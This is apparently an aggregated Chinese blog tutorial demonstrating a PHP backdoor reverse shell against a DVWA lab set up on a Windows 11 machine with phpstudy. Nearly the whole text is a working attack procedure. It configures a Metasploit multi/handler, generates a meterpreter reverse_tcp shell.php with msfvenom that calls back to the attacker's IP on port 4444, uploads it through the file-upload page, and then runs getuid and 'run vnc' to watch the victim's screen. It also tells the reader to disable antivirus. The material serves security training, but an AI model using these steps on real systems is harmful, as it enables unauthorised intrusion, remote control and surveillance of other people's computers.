2

PHP后门反弹演示

 1 year ago
source link: https://blog.51cto.com/u_15936127/6007605
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
  1. 一台kali虚拟机
  2. 一台 win11物理机
  1. phpstudy 开启 Nginx和Mysql
  2. phpstudy中已经搭建好DVWA靶场
  3. DVWA靶场的安全等级调整值low

需要将杀毒软件个关了, 否则有提示, 黑客入侵.

使用监控模块, 输入:

use exploit/multi/handler

配置payload

set payload php/meterpreter/reverse_tcp

# 接着输入
options
PHP后门反弹演示_Nginx

设置 lhost 和lport

这里发现 攻击机的端口不用设置了, 已经有了, 只要设置lhost 就可以了

set lhost 攻击机的ip
PHP后门反弹演示_php_02

生成php后门执行攻击获得meterpreter

注意:  要新建端口, 在root权限下执行

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip lport=4444 R>shell.php
PHP后门反弹演示_Nginx_03
PHP后门反弹演示_上传_04

这样在window11左面少就有这个文件了

这是我原来的地址: http://dvwa/vulnerabilities/upload/#

这是我要填写的地址: http://dvwa/hackable/uploads/shell.php

出现上图几面说明:   这是正常的, 后门已经上传到了靶机上

run

# 也可以直接输入 exploit , 都一样

PHP后门反弹演示_php_05

也可能出现 404, 都是正常现象

只要有这两行, 就代表上传的后门生效了

PHP后门反弹演示_上传_06

  1. 获取管理员的名字, 输入:
getuid
  1. 观看屏幕 可以在meterpreter里输入
run vnc

点开文件即可看到自己电脑的画面


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK